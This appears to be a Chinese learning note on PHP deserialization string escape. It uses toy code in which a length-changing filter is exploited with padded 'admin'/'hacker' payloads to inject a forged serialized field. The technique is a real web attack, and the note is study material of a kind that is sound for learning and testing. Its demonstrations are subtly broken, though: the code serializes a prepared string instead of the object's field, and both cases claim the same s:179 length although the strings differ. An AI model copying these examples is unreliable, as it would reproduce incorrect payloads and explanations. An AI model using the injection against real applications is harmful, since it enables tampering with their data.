反序列化字符串逃逸学习

d1omg
#字符串增多。
<?php
function waf($fun)
{
    return str_replace('admin','hacker',$fun);
}
class Info{
    public $age;
    public $nickname;
}
$a=new Info();
$a->age=20;
$a->nickname="wangsulu";

echo waf(serialize($a));

问:我想控制nickname是jiadaqu而不是wangsulu怎么办?

首先正常序列化出来
O:4:"Info":2:{s:3:"age";i:20;s:8:"nickname";s:8:"wangsulu";}
取来我们需要的部分
;s:8:"wangsulu";
在开头加"结尾加}
";s:8:"jiadaqu";} 长度为17
加在末尾
O:4:"Info":2:{s:3:"age";i:20;s:8:"nickname";s:8:"wangsulu";}";s:8:"jiadaqu";}
我们需要17个admin。
adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminO:4:"Info":2:{s:3:"age";i:20;s:8:"nickname";s:8:"wangsulu";}";s:8:"jiadaqu";}

<?php
function waf($fun)
{
    return str_replace('admin','hacker',$fun);
}
class Info{
    public $age;
    public $nickname;
}
$a=new Info();
$a->age=20;
$a->nickname="wangsulu";

//echo waf(serialize($a));

echo serialize(waf('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminO:4:"Info":2:{s:3:"age";i:20;s:8:"nickname";s:8:"wangsulu";}";s:8:"jiadaqu";}'));
#经过这样序列化之后即可得到想要的。
#s:179:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerO:4:"Info":2:{s:3:"age";i:20;s:8:"nickname";s:8:"wangsulu";}";s:8:"jiadaqu";}";

#字符串减少
<?php
function waf($fun)
{
    return str_replace('hacker','admin',$fun);
}
class Info{
    public $age;
    public $nickname;
}
$a=new Info();
$a->age=20;
$a->nickname="wangsulu";

//echo serialize($a);
# 正常输出
# O:4:"Info":2:{s:3:"age";i:20;s:8:"nickname";s:8:"wangsulu";}
# 与增加的思路差不多。就是我们要把吞掉多少字符给算出来。
# 假设要";s:8:"jiadaqu";}被显示出来。那么
# ;s:8:"wangsulu";}是17个。我们要吞掉17个字符。
# O:4:"Info":2:{s:3:"age";i:20;s:8:"nickname";s:8:"wangsulu";}";s:8:"jiadaqu";}
$b='hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerO:4:"Info":2:{s:3:"age";i:20;s:8:"nickname";s:8:"wangsulu";}";s:8:"jiadaqu";}';
echo waf(serialize($b));
# 输出s:179:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminO:4:"Info":2:{s:3:"age";i:20;s:8:"nickname";s:8:"wangsulu";}";s:8:"jiadaqu";}";

This article was updated on November 4, 2024